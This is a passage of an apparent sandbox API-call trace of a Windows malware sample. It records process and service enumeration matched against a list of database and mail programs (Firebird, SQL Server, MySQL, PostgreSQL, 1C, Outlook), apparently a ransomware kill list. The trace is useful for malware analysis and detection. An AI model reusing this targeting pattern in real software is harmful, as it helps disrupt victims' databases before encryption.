dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.739] lstrlenW (lpString="cmd.exe") returned 7 [0048.740] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.740] lstrlenW (lpString="conhost.exe") returned 11 [0048.740] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0048.741] lstrlenW (lpString="vssadmin.exe") returned 12 [0048.741] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0048.742] lstrlenW (lpString="VSSVC.exe") returned 9 [0048.742] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.744] lstrlenW (lpString="svchost.exe") returned 11 [0048.744] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0048.745] CloseHandle (hObject=0x190) returned 1 [0048.745] Sleep (dwMilliseconds=0x1f4) [0049.396] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x67fec8 [0049.396] EnumServicesStatusExW (in: hSCManager=0x67fec8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0049.397] GetLastError () returned 0xea [0049.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0049.397] EnumServicesStatusExW (in: hSCManager=0x67fec8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0049.399] CloseServiceHandle (hSCObject=0x67fec8) returned 1 [0049.399] lstrlenW (lpString="Appinfo") returned 7 [0049.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0049.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0049.399] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0049.399] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0049.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0049.399] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0049.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.399] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0049.399] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0049.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0049.400] lstrlenW (lpString="AudioSrv") returned 8 [0049.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0049.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0049.400] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0049.400] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0049.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0049.400] lstrlenW (lpString="BFE") returned 3 [0049.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0049.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0049.400] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0049.400] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0049.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0049.400] lstrlenW (lpString="CryptSvc") returned 8 [0049.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0049.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0049.400] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0049.400] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0049.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0049.400] lstrlenW (lpString="CscService") returned 10 [0049.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0049.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0049.400] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0049.400] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0049.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0049.400] lstrlenW (lpString="DcomLaunch") returned 10 [0049.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.400] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0049.400] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0049.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0049.400] lstrlenW (lpString="Dhcp") returned 4 [0049.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0049.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0049.400] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0049.400] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0049.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0049.400] lstrlenW (lpString="Dnscache") returned 8 [0049.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0049.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0049.401] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0049.401] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0049.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0049.401] lstrlenW (lpString="DPS") returned 3 [0049.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0049.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0049.401] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0049.401] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0049.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0049.401] lstrlenW (lpString="eventlog") returned 8 [0049.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0049.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0049.401] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0049.401] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0049.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0049.401] lstrlenW (lpString="EventSystem") returned 11 [0049.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0049.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0049.401] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0049.401] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0049.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0049.401] lstrlenW (lpString="gpsvc") returned 5 [0049.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0049.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0049.401] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0049.401] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0049.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0049.401] lstrlenW (lpString="iphlpsvc") returned 8 [0049.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.401] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0049.401] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0049.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0049.401] lstrlenW (lpString="LanmanServer") returned 12 [0049.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0049.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0049.402] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0049.402] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0049.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0049.402] lstrlenW (lpString="LanmanWorkstation") returned 17 [0049.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.402] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0049.402] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0049.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0049.402] lstrlenW (lpString="lmhosts") returned 7 [0049.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0049.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0049.402] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0049.402] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0049.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0049.402] lstrlenW (lpString="MMCSS") returned 5 [0049.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0049.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0049.402] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0049.402] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0049.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0049.402] lstrlenW (lpString="MpsSvc") returned 6 [0049.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0049.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0049.402] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0049.402] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0049.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0049.402] lstrlenW (lpString="Netman") returned 6 [0049.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0049.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0049.403] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0049.403] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0049.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0049.403] lstrlenW (lpString="netprofm") returned 8 [0049.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0049.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0049.403] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0049.403] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0049.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0049.403] lstrlenW (lpString="NlaSvc") returned 6 [0049.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0049.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0049.403] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0049.403] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0049.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0049.403] lstrlenW (lpString="nsi") returned 3 [0049.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0049.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0049.403] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0049.403] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0049.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0049.403] lstrlenW (lpString="PcaSvc") returned 6 [0049.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0049.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0049.403] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0049.403] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0049.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0049.403] lstrlenW (lpString="PlugPlay") returned 8 [0049.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0049.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0049.403] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0049.403] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0049.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0049.403] lstrlenW (lpString="Power") returned 5 [0049.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0049.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0049.404] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0049.404] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0049.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0049.404] lstrlenW (lpString="ProfSvc") returned 7 [0049.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0049.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0049.404] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0049.404] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0049.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0049.404] lstrlenW (lpString="RpcEptMapper") returned 12 [0049.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.404] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0049.404] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0049.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0049.404] lstrlenW (lpString="RpcSs") returned 5 [0049.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0049.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0049.404] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0049.404] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0049.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0049.404] lstrlenW (lpString="SamSs") returned 5 [0049.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0049.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0049.404] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0049.404] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0049.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0049.404] lstrlenW (lpString="Schedule") returned 8 [0049.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0049.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0049.404] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0049.404] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0049.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0049.404] lstrlenW (lpString="SENS") returned 4 [0049.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0049.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0049.404] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0049.405] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0049.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0049.405] lstrlenW (lpString="ShellHWDetection") returned 16 [0049.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.405] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0049.405] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0049.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0049.405] lstrlenW (lpString="Spooler") returned 7 [0049.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0049.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0049.405] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0049.405] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0049.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0049.405] lstrlenW (lpString="swprv") returned 5 [0049.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0049.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0049.405] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0049.405] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0049.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0049.405] lstrlenW (lpString="SysMain") returned 7 [0049.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0049.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0049.405] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0049.405] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0049.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0049.405] lstrlenW (lpString="Themes") returned 6 [0049.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0049.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0049.405] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0049.405] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0049.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0049.405] lstrlenW (lpString="TrkWks") returned 6 [0049.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0049.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0049.405] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0049.405] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0049.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0049.406] lstrlenW (lpString="UxSms") returned 5 [0049.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0049.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0049.406] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0049.406] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0049.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0049.406] lstrlenW (lpString="VSS") returned 3 [0049.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0049.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0049.406] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0049.406] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0049.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0049.406] lstrlenW (lpString="WdiServiceHost") returned 14 [0049.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.407] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0049.407] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0049.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0049.407] lstrlenW (lpString="WdiSystemHost") returned 13 [0049.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.407] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0049.407] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0049.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0049.407] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0049.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.407] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0049.407] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0049.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0049.407] lstrlenW (lpString="Winmgmt") returned 7 [0049.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0049.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0049.407] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0049.407] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0049.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0049.407] lstrlenW (lpString="WPDBusEnum") returned 10 [0049.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.407] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0049.407] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0049.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0049.407] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0049.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0049.409] Process32FirstW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0049.410] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0049.410] lstrlenW (lpString="System") returned 6 [0049.410] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0049.410] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0049.410] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0049.411] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0049.411] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0049.411] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0049.411] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0049.411] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0049.411] lstrlenW (lpString="smss.exe") returned 8 [0049.411] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0049.411] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0049.411] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0049.411] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0049.411] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0049.411] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0049.411] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0049.411] 